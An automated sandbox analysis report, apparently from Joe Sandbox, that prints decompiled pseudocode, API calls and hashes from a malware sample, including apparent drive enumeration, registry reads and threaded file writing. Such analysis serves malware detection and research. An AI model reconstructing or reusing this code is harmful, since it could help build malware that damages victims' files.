                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 195641996-0
                                                                                                                                                            • Opcode ID: 417fc28789d5f1bbb6260895ba004ecc8bc955c4486b1040fbe50631365a7184
                                                                                                                                                            • Instruction ID: 984ccbf371d148ce5a78b8e0d1cf3783b4af7d1535fa248b42a154d2ce26d2ae
                                                                                                                                                            • Opcode Fuzzy Hash: 417fc28789d5f1bbb6260895ba004ecc8bc955c4486b1040fbe50631365a7184
                                                                                                                                                            • Instruction Fuzzy Hash: BAF089765456297F67101A796CC4E777B5CD9457F8321032AFD24D2290DA31DC5045A1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C1DB3, Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                            			E009C1DB3(void* __edx, int* _a4) {
				char _v8;
				short _v12;
				char _v28;
				short _v30;
				char _v80;
				short _v82;
				char _v396;
				void* _t29;
				intOrPtr _t35;
				void* _t39;
				void* _t46;
				void* _t53;
				void* _t55;
				void* _t57;
				void* _t58;
				int* _t59;
				void* _t60;
				void* _t62;
				void* _t63;

				_t58 = __edx;
				E009C5DE2(0x9d0270, 0xb19, 4, 0x32,  &_v80);
				_v30 = 0;
				E009C5DE2(0x9d0270, 0xc82, 9, 0x10,  &_v28);
				_t59 = _a4;
				_v12 = 0;
				_t29 = E009C550A(0x80000002,  &_v80,  &_v28,  &_v8, _t59); // executed
				_t60 = _t29;
				_t63 = _t62 + 0x3c;
				if(_t60 != 0) {
					L2:
					if(_v8 == 3) {
						L8:
						return _t60;
					}
					L3:
					_t55 = E009C47AB(0x20000);
					if(_t55 != 0) {
						E009C5DE2(0x9d0270, 0x71b, 0xb, 0x13a,  &_v396);
						_v82 = 0;
						_t35 =  *0x9d2208; // 0x2e3d500
						 *0x9d126c(_t55, 0x20000,  &_v396, 0x203,  *0x9d21f0,  *0x9d21f4,  *0x9d220c,  *0x9d2210,  *0x9d2214,  *0x9d2218,  *0x9d221c,  *0x9d2220,  *0x9d2224,  *0x9d2228,  *0x9d222c,  *0x9d228c,  *0x9d2230, _t35 + 2);
						_t39 = E009C6250(_t55);
						_t57 = _t59;
						_push(_t39 + _t39);
						_push(_t55);
						_push(0x9d0000);
						_t60 = E009C6B67(_t58);
						E009C47F8(_t55);
						if(_t60 == 0) {
							goto L4;
						}
						_t46 = E009C5588(_t57, 0x80000002,  &_v80,  &_v28, 3, _t60,  *_t59); // executed
						if(_t46 == 0) {
							E009C5588(_t57, 0x80000001,  &_v80,  &_v28, 3, _t60,  *_t59);
						}
						goto L8;
					}
					L4:
					return 0;
				}
				_t53 = E009C550A(0x80000001,  &_v80,  &_v28,  &_v8, _t59); // executed
				_t60 = _t53;
				_t63 = _t63 + 0x14;
				if(_t60 == 0) {
					goto L3;
				}
				goto L2;
			}






















                                                                                                                                                            0x009c1db3
                                                                                                                                                            0x009c1dd2
                                                                                                                                                            0x009c1dd9
                                                                                                                                                            0x009c1deb
                                                                                                                                                            0x009c1df0
                                                                                                                                                            0x009c1df5
                                                                                                                                                            0x009c1e0b
                                                                                                                                                            0x009c1e10
                                                                                                                                                            0x009c1e12
                                                                                                                                                            0x009c1e17
                                                                                                                                                            0x009c1e39
                                                                                                                                                            0x009c1e3d
                                                                                                                                                            0x009c1f4e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c1f4e
                                                                                                                                                            0x009c1e43
                                                                                                                                                            0x009c1e4e
                                                                                                                                                            0x009c1e53
                                                                                                                                                            0x009c1e74
                                                                                                                                                            0x009c1e7b
                                                                                                                                                            0x009c1e7f
                                                                                                                                                            0x009c1ee4
                                                                                                                                                            0x009c1eef
                                                                                                                                                            0x009c1ef4
                                                                                                                                                            0x009c1ef7
                                                                                                                                                            0x009c1ef8
                                                                                                                                                            0x009c1ef9
                                                                                                                                                            0x009c1f04
                                                                                                                                                            0x009c1f06
                                                                                                                                                            0x009c1f10
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c1f28
                                                                                                                                                            0x009c1f32
                                                                                                                                                            0x009c1f46
                                                                                                                                                            0x009c1f4b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c1f32
                                                                                                                                                            0x009c1e55
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c1e55
                                                                                                                                                            0x009c1e2b
                                                                                                                                                            0x009c1e30
                                                                                                                                                            0x009c1e32
                                                                                                                                                            0x009c1e37
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C550A: RegOpenKeyExW.KERNEL32(0000000C,0000000F,00000000,00000001,?,009D0270,00000000,?,?,009C233B,80000002,?,?,?,?,009D0270), ref: 009C5521
                                                                                                                                                              • Part of subcall function 009C550A: RegQueryValueExW.KERNEL32(?,00000A8C,00000000,009D0270,00000000,?,80000002,?,?,009C233B,80000002,?,?,?,?,009D0270), ref: 009C553B
                                                                                                                                                              • Part of subcall function 009C550A: RegQueryValueExW.KERNEL32(?,00000A8C,00000000,009D0270,00000000,?,?,?,009C233B,80000002,?,?,?,?,009D0270,00000A8C), ref: 009C5563
                                                                                                                                                              • Part of subcall function 009C550A: RegCloseKey.KERNEL32(?,?,?,009C233B,80000002,?,?,?,?,009D0270,00000A8C,0000000F,0000000C,?), ref: 009C5579
                                                                                                                                                            • _snwprintf.NTDLL ref: 009C1EE4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: QueryValue$CloseOpen_snwprintf
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 775465768-0
                                                                                                                                                            • Opcode ID: 15593e4df166b180266831fe0154e74ad9797f0193ed234ca67b2ba11470f997
                                                                                                                                                            • Instruction ID: c2917ed80c217e81aeb8399abf654aa5a6b7005070312df62fdacac2e981befb
                                                                                                                                                            • Opcode Fuzzy Hash: 15593e4df166b180266831fe0154e74ad9797f0193ed234ca67b2ba11470f997
                                                                                                                                                            • Instruction Fuzzy Hash: A841A372D85208BBDB229BD0DC42FEF7B7CEF59710F00401AFB15E2152E7219A9197A6
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C797A, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                            			E009C797A(int _a4) {
				short _v6;
				char _v20;
				WCHAR* _t11;
				int _t17;
				signed int _t19;
				void* _t30;
				WCHAR* _t32;

				_t11 = E009C47AB(0xfffe); // executed
				_t32 = _t11;
				if(_t32 == 0) {
					return _t11;
				}
				E009C5DE2(0x9d12d0, 0x573, 0xc, 0xe,  &_v20);
				_v6 = 0;
				E009C61A7(_t32,  &_v20);
				_t30 = 0x5a;
				while(1) {
					_push(_t32);
					if( *(_t32 + 8) > _t30) {
						break;
					}
					_t17 = GetDriveTypeW(); // executed
					if(_t17 == 2 || _t17 == 3) {
						 *0x9d1d00 =  *0x9d1d00 & 0x00000000;
						E009C761A(_t32, _a4); // executed
						_t19 =  *(_t32 + 8) & 0x0000ffff;
						if(_t19 >= 0x61 && _t19 <= 0x7a) {
							 *(_t32 + 8) = _t19 & 0x0000ffdf;
						}
					}
					 *(_t32 + 8) =  *(_t32 + 8) + 1;
					 *((short*)(_t32 + 0xe)) = 0;
				}
				E009C47F8();
				return 1;
			}










                                                                                                                                                            0x009c7986
                                                                                                                                                            0x009c798b
                                                                                                                                                            0x009c7990
                                                                                                                                                            0x009c7a1e
                                                                                                                                                            0x009c7a1e
                                                                                                                                                            0x009c79a9
                                                                                                                                                            0x009c79b0
                                                                                                                                                            0x009c79b9
                                                                                                                                                            0x009c79c3
                                                                                                                                                            0x009c7a09
                                                                                                                                                            0x009c7a09
                                                                                                                                                            0x009c7a0e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c79c6
                                                                                                                                                            0x009c79cf
                                                                                                                                                            0x009c79d9
                                                                                                                                                            0x009c79e1
                                                                                                                                                            0x009c79e6
                                                                                                                                                            0x009c79ef
                                                                                                                                                            0x009c79fb
                                                                                                                                                            0x009c79fb
                                                                                                                                                            0x009c79ef
                                                                                                                                                            0x009c79ff
                                                                                                                                                            0x009c7a05
                                                                                                                                                            0x009c7a05
                                                                                                                                                            0x009c7a10
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            • GetDriveTypeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000000,?,?,009C3502,?,?,00000000,00000000), ref: 009C79C6
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CreateDriveProcessType
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1501148493-0
                                                                                                                                                            • Opcode ID: 9866d9d1813ef95e08e539fb2e1eb8f03eae1afd6ecf9f75f6f6b772e915d104
                                                                                                                                                            • Instruction ID: b8b557f13b905c818834d75c75ce6d1e00ddb03b517755c54e5ae95a2e1e7244
                                                                                                                                                            • Opcode Fuzzy Hash: 9866d9d1813ef95e08e539fb2e1eb8f03eae1afd6ecf9f75f6f6b772e915d104
                                                                                                                                                            • Instruction Fuzzy Hash: 5D014833D58A0565E320BBE4DC02FBFB3A9EF42721F108C2EE516D50D1E66099808757
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C4F25, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                            			E009C4F25(void* __edx) {
				char _v8;
				short _v12;
				short _v28;
				char _v92;
				WCHAR* _t11;
				char _t12;
				void* _t14;
				void* _t30;
				WCHAR* _t31;

				_t30 = __edx;
				_t11 = E009C47AB(0x22);
				_t31 = _t11;
				if(_t31 != 0) {
					_t12 = E009C569B(); // executed
					_v8 = _t12;
					_t14 = E009C6962(0x539,  &_v8, 4);
					E009C4832( &_v92, 0, 0x40);
					E009C4B58(_t30,  &_v92);
					E009C5DE2(0x9d12d0, 0x2d, 8, 0x10,  &_v28);
					_v12 = 0;
					_push(_v8);
					wsprintfW(_t31,  &_v28, E009C6962(_t14,  &_v92, E009C623D( &_v92)));
					return _t31;
				}
				return _t11;
			}












                                                                                                                                                            0x009c4f25
                                                                                                                                                            0x009c4f2e
                                                                                                                                                            0x009c4f33
                                                                                                                                                            0x009c4f38
                                                                                                                                                            0x009c4f3b
                                                                                                                                                            0x009c4f40
                                                                                                                                                            0x009c4f4e
                                                                                                                                                            0x009c4f5d
                                                                                                                                                            0x009c4f66
                                                                                                                                                            0x009c4f7a
                                                                                                                                                            0x009c4f84
                                                                                                                                                            0x009c4f8b
                                                                                                                                                            0x009c4fa8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c4fb3
                                                                                                                                                            0x009c4fb8

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                              • Part of subcall function 009C569B: GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000022,?,009C4F40,00000000,0000000A), ref: 009C56BE
                                                                                                                                                            • wsprintfW.USER32 ref: 009C4FA8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CreateInformationProcessVolumewsprintf
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2230357944-0
                                                                                                                                                            • Opcode ID: bfb8ca8abcba3af90d39ba9a6eefda3f370e2d55d81101cc26815c2b6cc95d82
                                                                                                                                                            • Instruction ID: 5b7ddb8bcaf37a7f392944582deae4633fd3d90d56a82508adf97859497b3062
                                                                                                                                                            • Opcode Fuzzy Hash: bfb8ca8abcba3af90d39ba9a6eefda3f370e2d55d81101cc26815c2b6cc95d82
                                                                                                                                                            • Instruction Fuzzy Hash: DE0180B2E406087AE701ABE48C47FEFB77C9F84700F00055AFB00E6181EA719A5547A6
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C3740, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E009C3740(intOrPtr _a4, intOrPtr _a8) {
				long _t9;
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr _t18;
				void* _t19;
				void* _t20;
				intOrPtr _t22;

				_t18 = _a4;
				 *((intOrPtr*)(_t18 + 0x150)) = 3;
				 *((intOrPtr*)(_t18 + 0x154)) = _a8;
				if( *0x9d2278 == 1) {
					_t15 =  *((intOrPtr*)(_t18 + 0x24));
					_t11 =  *((intOrPtr*)(_t18 + 0x20));
					_t22 = _t15;
					if(_t22 >= 0 && (_t22 > 0 || _t11 > 0x100000)) {
						asm("sbb ecx, 0x0");
						_push(_t15);
						E009C75E6(_t18, _t11 - 0x100000);
						_t19 = _t19 + 0xc;
					}
				}
				_t17 = _t18 + 0x28;
				_t9 = E009C7600(_t18, _t18 + 0x28, 0xe8); // executed
				_t20 = _t19 + 0xc;
				while(_t9 == 0) {
					_t9 = RtlGetLastWin32Error();
					if(_t9 == 0x3e5) {
						break;
					}
					E009C568D(_t9, 0x64);
					_t9 = E009C7600(_t18, _t17, 0xe8);
					_t20 = _t20 + 0x10;
				}
				return _t9;
			}










                                                                                                                                                            0x009c3748
                                                                                                                                                            0x009c374c
                                                                                                                                                            0x009c3756
                                                                                                                                                            0x009c3763
                                                                                                                                                            0x009c3765
                                                                                                                                                            0x009c3768
                                                                                                                                                            0x009c376b
                                                                                                                                                            0x009c376d
                                                                                                                                                            0x009c377c
                                                                                                                                                            0x009c377f
                                                                                                                                                            0x009c3782
                                                                                                                                                            0x009c3787
                                                                                                                                                            0x009c3787
                                                                                                                                                            0x009c376d
                                                                                                                                                            0x009c378f
                                                                                                                                                            0x009c3795
                                                                                                                                                            0x009c379a
                                                                                                                                                            0x009c37bd
                                                                                                                                                            0x009c379f
                                                                                                                                                            0x009c37a9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c37ad
                                                                                                                                                            0x009c37b5
                                                                                                                                                            0x009c37ba
                                                                                                                                                            0x009c37ba
                                                                                                                                                            0x009c37c5

                                                                                                                                                            APIs
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C379F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastWin32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3973360955-0
                                                                                                                                                            • Opcode ID: 87c09223644b75ec9e390af4be5e7d56f2714878cec41d121fe73b9fc07ea183
                                                                                                                                                            • Instruction ID: 130fca4343532014926e091f1b43fabeee9f54fbd06ea1d25b0f91ff6ea77de5
                                                                                                                                                            • Opcode Fuzzy Hash: 87c09223644b75ec9e390af4be5e7d56f2714878cec41d121fe73b9fc07ea183
                                                                                                                                                            • Instruction Fuzzy Hash: AC01F7F6D00B005BEB156A78DD45F6B739CDBC5304F00C62DF50896241D261AE404AA3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C36C9, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                            			E009C36C9(void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				long _t17;
				void* _t19;
				intOrPtr _t21;
				void* _t22;
				void* _t23;

				_t19 = __edx;
				_t21 = _a4;
				E009C82C9(_t21 + 0x110, _t21 + 0x15c, _t21 + 0x15c, _a8);
				 *((intOrPtr*)(_t21 + 0x154)) = _a12;
				 *((intOrPtr*)(_t21 + 0x150)) = 2;
				asm("cdq");
				_push(_t19);
				E009C75E6(_t21,  ~_a8);
				_t17 = E009C7600(_t21, _t20, _a8); // executed
				_t23 = _t22 + 0x28;
				while(_t17 == 0) {
					_t17 = RtlGetLastWin32Error();
					if(_t17 != 0x3e5) {
						E009C568D(_t17, 0x64);
						_t17 = E009C7600(_t21, _t20, _a8);
						_t23 = _t23 + 0x10;
						continue;
					}
					break;
				}
				return _t17;
			}








                                                                                                                                                            0x009c36c9
                                                                                                                                                            0x009c36cd
                                                                                                                                                            0x009c36e3
                                                                                                                                                            0x009c36eb
                                                                                                                                                            0x009c36f6
                                                                                                                                                            0x009c3700
                                                                                                                                                            0x009c3701
                                                                                                                                                            0x009c3704
                                                                                                                                                            0x009c370e
                                                                                                                                                            0x009c3713
                                                                                                                                                            0x009c3738
                                                                                                                                                            0x009c3718
                                                                                                                                                            0x009c3722
                                                                                                                                                            0x009c3726
                                                                                                                                                            0x009c3730
                                                                                                                                                            0x009c3735
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3735
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c3722
                                                                                                                                                            0x009c373f

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C7600: WriteFile.KERNEL32(?,?,009C3673,00000000,?,?,009C3713,?,?,?,?,?), ref: 009C7612
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C3718
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastWin32Write
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2457671358-0
                                                                                                                                                            • Opcode ID: 03f6508b5fc2f50e9868227dfb9455b21a37afcbb0d30eda07eeccd9f1a19bea
                                                                                                                                                            • Instruction ID: 8d1451dc4dd72aca0af8e03e70fb60159911f61cf4eeb70e683dc2d81b483af9
                                                                                                                                                            • Opcode Fuzzy Hash: 03f6508b5fc2f50e9868227dfb9455b21a37afcbb0d30eda07eeccd9f1a19bea
                                                                                                                                                            • Instruction Fuzzy Hash: 7CF0A4B6900A48BBCB126FE9CC4AFDB77ACDFCA314F00840DF91886201D634A64087B3
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C748F, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C748F(void* __eflags, intOrPtr* _a4, intOrPtr _a8, long _a12, _Unknown_base(*)()* _a16) {
				intOrPtr _t7;
				void* _t8;
				void* _t9;
				intOrPtr* _t21;

				_t7 = E009C476A(_a8); // executed
				_t21 = _a4;
				 *_t21 = _t7;
				if(_t7 != 0) {
					_t8 = CreateIoCompletionPort(0xffffffff, 0, 0, _a12);
					 *(_t21 + 4) = _t8;
					if(_t8 != 0) {
						_t9 = E009C743F(_t21, _a16); // executed
						if(_t9 != 0) {
							return 1;
						}
						E009C4787( *_t21);
						E009C4B21( *(_t21 + 4));
						L4:
						goto L1;
					}
					E009C4787( *_t21);
					goto L4;
				}
				L1:
				return 0;
			}







                                                                                                                                                            0x009c7496
                                                                                                                                                            0x009c749b
                                                                                                                                                            0x009c749f
                                                                                                                                                            0x009c74a3
                                                                                                                                                            0x009c74b2
                                                                                                                                                            0x009c74b8
                                                                                                                                                            0x009c74bd
                                                                                                                                                            0x009c74cd
                                                                                                                                                            0x009c74d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c74ec
                                                                                                                                                            0x009c74da
                                                                                                                                                            0x009c74e2
                                                                                                                                                            0x009c74c6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c74c6
                                                                                                                                                            0x009c74c1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c74c1
                                                                                                                                                            0x009c74a5
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C476A: HeapCreate.KERNEL32(00000000,00000000,00000000,?,009C749B,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C477F
                                                                                                                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,009C3571,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000,00000000), ref: 009C74B2
                                                                                                                                                              • Part of subcall function 009C743F: CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 009C7463
                                                                                                                                                              • Part of subcall function 009C4787: HeapDestroy.KERNEL32(00000000,?,009C74DF,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000,00000000), ref: 009C478D
                                                                                                                                                              • Part of subcall function 009C4B21: FindCloseChangeNotification.KERNEL32(00000000,?,009C7476,00000000,?,009C74D2,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C4B2D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Create$Heap$ChangeCloseCompletionDestroyFindNotificationPortThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1739922738-0
                                                                                                                                                            • Opcode ID: 86137bb47feb86b2f565dac7b01bbda650574f81b9c5bf3efd5bdd95218eb08c
                                                                                                                                                            • Instruction ID: 0c8a239fbb179f0b5994299c482dcf648cca6ed87a087d4efa617aadffc26f7d
                                                                                                                                                            • Opcode Fuzzy Hash: 86137bb47feb86b2f565dac7b01bbda650574f81b9c5bf3efd5bdd95218eb08c
                                                                                                                                                            • Instruction Fuzzy Hash: 88F09C31A0C202ABDB252FA0EC11F56BF9ADF41771F20852DF555D50B1EB21D8505E43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C743F, Relevance: 1.5, APIs: 1, Instructions: 39threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C743F(void* _a4, _Unknown_base(*)()* _a8) {
				signed int _t8;
				void* _t11;
				void* _t14;
				struct _SECURITY_ATTRIBUTES* _t18;
				void* _t19;

				_t19 = _a4;
				_t18 = 0;
				 *((intOrPtr*)(_t19 + 8)) = 0;
				_t8 = E009C5370(); // executed
				if((_t8 & 0x7fffffff) <= 0) {
					L3:
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t11 = CreateThread(0, 0, _a8, _t19, 0, 0); // executed
					if(_t11 == 0) {
						break;
					}
					 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) + 1;
					E009C4B21(_t11); // executed
					_t18 =  &(_t18->nLength); // executed
					_t14 = E009C5370(); // executed
					if(_t18 < _t14 + _t14) {
						continue;
					}
					goto L3;
				}
				return 0;
			}








                                                                                                                                                            0x009c7444
                                                                                                                                                            0x009c744a
                                                                                                                                                            0x009c744c
                                                                                                                                                            0x009c744f
                                                                                                                                                            0x009c7459
                                                                                                                                                            0x009c7483
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c745b
                                                                                                                                                            0x009c745b
                                                                                                                                                            0x009c7463
                                                                                                                                                            0x009c746b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c746d
                                                                                                                                                            0x009c7471
                                                                                                                                                            0x009c7477
                                                                                                                                                            0x009c7478
                                                                                                                                                            0x009c7481
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c7481
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C5370: GetSystemInfo.KERNEL32(?,?,009C33C5,?,00000000,00000000,009C3571,00000000,00000000), ref: 009C537A
                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 009C7463
                                                                                                                                                              • Part of subcall function 009C4B21: FindCloseChangeNotification.KERNEL32(00000000,?,009C7476,00000000,?,009C74D2,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C4B2D
                                                                                                                                                            Memory Dump Source
